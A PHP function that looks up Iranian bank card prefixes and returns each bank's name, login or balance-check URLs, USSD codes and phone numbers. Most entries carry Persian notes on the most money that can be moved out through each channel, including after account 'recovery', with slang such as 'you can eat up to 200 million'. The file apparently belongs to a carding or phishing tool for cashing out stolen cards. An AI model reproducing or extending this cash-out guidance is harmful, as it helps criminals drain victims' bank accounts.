<?php
function bank_information($cardn){
    $cardn = (integer)$cardn;
    if ($cardn == 603799 || $cardn == 170019 || $cardn == 589905) {
      $bankname = "#meli";  
      $bankinfo = "بانک ملی
⁉️Site: bale.apk
⁉️USSD: *717#  
⁉️TBank: 09622
بله ۱۰میل میشه انقتال داد،اپ ۵میل،بازیابی بزنی بعد ۲ساعت فعال میشه تا ۲۰۰ میل میتونی بخوری
";
      }elseif ($cardn == 589210) {
        $bankname = "#sepah";
        $bankinfo = "بانک سپه
⁉️Site: https://ib.ebanksepah.ir/desktop/sepahPages/shetabCard.sepah
⁉️USSD: #
⁉️TBank: 021 64058
همراه بانک ۱۰میل میشه انتقال داد
";
      }elseif ($cardn == 627648 || $cardn == 207177) {
        $bankname = "#tosee_saderat";
        $bankinfo = "بانک توسعه صادرات
⁉️Site: #
⁉️USSD: #
⁉️TBank: 021 2722
";
      }elseif ($cardn == 627961) {
        $bankname = "#sanat_madan";
        $bankinfo = "بانک صنعت و معدن
⁉️Site: #
⁉️USSD: *719#
⁉️TBank: 021 75024
";
      }elseif ($cardn == 603770 || $cardn == 639217) {
        $bankname = "#keshavarzi";
        $bankinfo = "بانک کشاورزی
⁉️Site: https://ib.bki.ir/pid46.lmx
⁉️USSD: *730#
⁉️TBank: 09603
از سایتش ۱۰ میل میشه انتقال داد کشاورزی به کشاورزی هم ۱۰ فککنم
";
      }elseif ($cardn == 628023) {
        $bankname = "#maskan";
        $bankinfo = "بانک مسکن
⁉️Site: #
⁉️USSD: *714#, *737#
⁉️TBank: 021 64096
بانک مسکن از تاپ ،آپ ۵ میشه انقتال داد
";
      }elseif ($cardn == 627760) {
        $bankname = "#post_bank_iran";
        $bankinfo = "پست بانک ایران
⁉️Site: #
⁉️USSD: *747#
⁉️TBank: 021 84284
پست بانک آپ فقط ۵ میل
";
      }elseif ($cardn == 502908) {
        $bankname = "#tosee_taavon";
        $bankinfo = "بانک توسعه تعاون
⁉️Site: https://epayment.ttbank.ir
⁉️USSD: #
⁉️TBank: #
توسعه ۵ میل آپ فقط
";
      }elseif ($cardn == 627412) {
        $bankname = "#eghtsad_novin";
        $bankinfo = "بانک اقتصاد نوین
⁉️Site: https://modern.enbank.net/CustomerManager/viewLogin.html
⁉️USSD: #
⁉️TBank: 021 85292
با همراه بانک ۱۰میل با آپ ۵میل میشه انتقال داد
";
      }elseif ($cardn == 622106 || $cardn == 639194 || $cardn == 627884) {
        $bankname = "#parsian";
        $bankinfo = "بانک پارسیان
⁉️Site: #
⁉️USSD: *708#
⁉️TBank: 021 89111
نت بانکش بازیابی بزنی تا ۱۰۰میل میشه ،همراه کارت،تاپ ۵ میل
";
      }elseif ($cardn == 502229 || $cardn == 639347) {
        $bankname = "#pasargad";
        $bankinfo = "بانک پاسارگاد
⁉️Site: https://epay.bpi.ir/balanceinquiry.aspx
⁉️USSD: *720#
⁉️TBank: 021 828991111
همراه بانک ۱۰میل ،آپ ۵ میل میشه انتقال داد
";
      }elseif ($cardn == 627488 || $cardn == 502910) {
        $bankname = "#kar_afarin";
        $bankinfo = "بانک کار افرین
⁉️Site: #
⁉️USSD: #
⁉️TBank: 021 23640
";
      }elseif ($cardn == 621986) {
        $bankname = "#saman";
        $bankinfo = "بانک سامان
⁉️Site: #
⁉️USSD: *724#
⁉️TBank: 021 6422
سامان دیگه پشتبانی نمی‌ده همراه بانکش فک کنم شده همون بلو بانک که ۵ میلیون از آپ می‌ره کلا
";
      }elseif ($cardn == 639346) {
        $bankname = "#sina";
        $bankinfo = "بانک سینا
⁉️Site: https://sina24h.com/CustomerService2/viewLogin.html
⁉️USSD: *727#
⁉️TBank: 021 82487
تاپ ۳میل میشه انتقال داد
";
      }elseif ($cardn == 639607) {
        $bankname = "#sarmaye";
        $bankinfo = "بانک سرمایه
⁉️Site: https://pg.sbank.ir/balanceRequest.do
⁉️USSD: #
⁉️TBank: 021 8254
تاپ ۵میل
";
      }elseif ($cardn == 636214) {
        $bankname = "#ayande";
        $bankinfo = "بانک آینده
⁉️Site: #
⁉️USSD: *745#
⁉️TBank: 021 2957
";
      }elseif ($cardn == 502806 || $cardn == 504706) {
        $bankname = "#shahr";
        $bankinfo = "بانک شهر
⁉️Site: https://ebank.city-bank.net/customermanager/viewLogin.html
⁉️USSD: *787#
⁉️TBank: 021 87611
بانک شهر از همراه بانکش ۱۰ میلیون می‌ره از خدمات کارت ( یبار امتحان کن ) با آپ هم ۵ میلیون میرن
";
      }elseif ($cardn == 502938) {
        $bankname = "#day";
        $bankinfo = "بانک دی
⁉️Site: #
⁉️USSD: #
⁉️TBank: 021 2726
دی با تاپ ۵میل میره
";
      }elseif ($cardn == 603769) {
        $bankname = "#saderat";
        $bankinfo = "بانک صادرات
⁉️Site: #
⁉️USSD: *719#
⁉️TBank: 09602
بانک صادرات از طریق آیفون بازیابی کنی اگه کارتش باشه ۱۰ پل ۱۰ ک ب ک میره اگه نباشه ده پل میره و تا صد میل سقف انتقال
مبالغ پایین با اپ تا 5 میل میرع
";
      }elseif ($cardn == 610433 || $cardn == 991975) {
        $bankname = "#mellat";
        $bankinfo = "بانک ملت
⁉️Site: #
⁉️USSD: *720#
⁉️TBank: 021 8132
ملت سکه نسخه قدیمی داشته باشی ۱۰میل،همراه بانک بازیابی بتونی بزنی تا ۱۰۰میل میش انتقال داد
";
      }elseif ($cardn == 585983) {
        $bankname = "#tejarat";
        $bankinfo = "بانک تجارت
⁉️Site: https://pg.tejaratbank.ir/paymentGateway/getBalance
⁉️USSD: #
⁉️TBank: 021 81277
بانک تجارت رو اگه بالا بود مبلغ بازیابی کن حساب به حساب هرتا ۱۰۰ می‌ره کل بانکا اگه کم بود از آپ ۵ میلیون همراه بانک هم تا ۱۰میل میره
";
      }elseif ($cardn == 589463) {
        $bankname = "#refah";
        $bankinfo = "بانک رفاه
⁉️Site: #
⁉️USSD: *729#
⁉️TBank: 021 84043000
اپ ۵میل میره رفاه
";
      }elseif ($cardn == 627381) {
        $bankname = "#ansar";
        $bankinfo = "بانک انصار
⁉️Site: https://ebank.ansarbank.com/customermanager/viewLogin.html
⁉️USSD: *763#
⁉️TBank: 021 48049
";
      }elseif ($cardn == 505785) {
        $bankname = "#iran_zamin";
        $bankinfo = "بانک ایران زمین
⁉️Site: #
⁉️USSD: #
⁉️TBank: 021 24760
تاپ ،آپ ۵میل
";
      }elseif ($cardn == 636795) {
        $bankname = "#markazi";
        $bankinfo = "بانک مرکزی
⁉️Site: #
⁉️USSD: #
⁉️TBank: #
";
      }elseif ($cardn == 636949) {
        $bankname = "#hekmat";
        $bankinfo = "بانک حکمت
⁉️Site: #
⁉️USSD: #
⁉️TBank: 021 89555
";
      }elseif ($cardn == 505416) {
        $bankname = "#gardeshgary";
        $bankinfo = "بانک گردشگری
⁉️Site: https://epayment.tourism-bank.com/BalanceInquiry.aspx
⁉️USSD: *764#
⁉️TBank: 021 22630345
بانک گردشگری همراه کارت ۵ میل،تاپ ۵میل
";
      }elseif ($cardn == 606373) {
        $bankname = "#qarzolhasane_iran";
        $bankinfo = "بانک قرضالحسنه ایران
⁉️Site: https://epayment.rqb.ir/BalanceInquiry.aspx
⁉️USSD: #
⁉️TBank: 021 8528
آپ فقط میشه ۵میل زد
";
      }elseif ($cardn == 628157) {
        $bankname = "#moasse_etebari_tosee";
        $bankinfo = "موسسه اعتباری توسعه
⁉️Site: #
⁉️USSD: #
⁉️TBank: 021 81461
";
      }elseif ($cardn == 505801) {
        $bankname = "#kosar";
        $bankinfo = "بانک کوثر
⁉️Site: #
⁉️USSD: *744#
⁉️TBank: 021 86777
";
      }elseif ($cardn == 639370) {
        $bankname = "#moasse_mehr";
        $bankinfo = "موسسه مهر
⁉️Site: https://modern.qmbi24.com/customermngr/viewLogin.html
⁉️USSD: #
⁉️TBank: 021 8989
";
      }elseif ($cardn == 639599) { 
        $bankname = "#qavamin";
        $bankinfo = "بانک قوامین
⁉️Site: #
⁉️USSD: #
⁉️TBank: 021 84270
قوامین ۵میل اپ میره
";
      }else{
        $bankname = "#بانک_نامعلوم";
        $bankinfo = "کارت فیکه!";
      }
      return array($bankinfo,$bankname);
}

?>
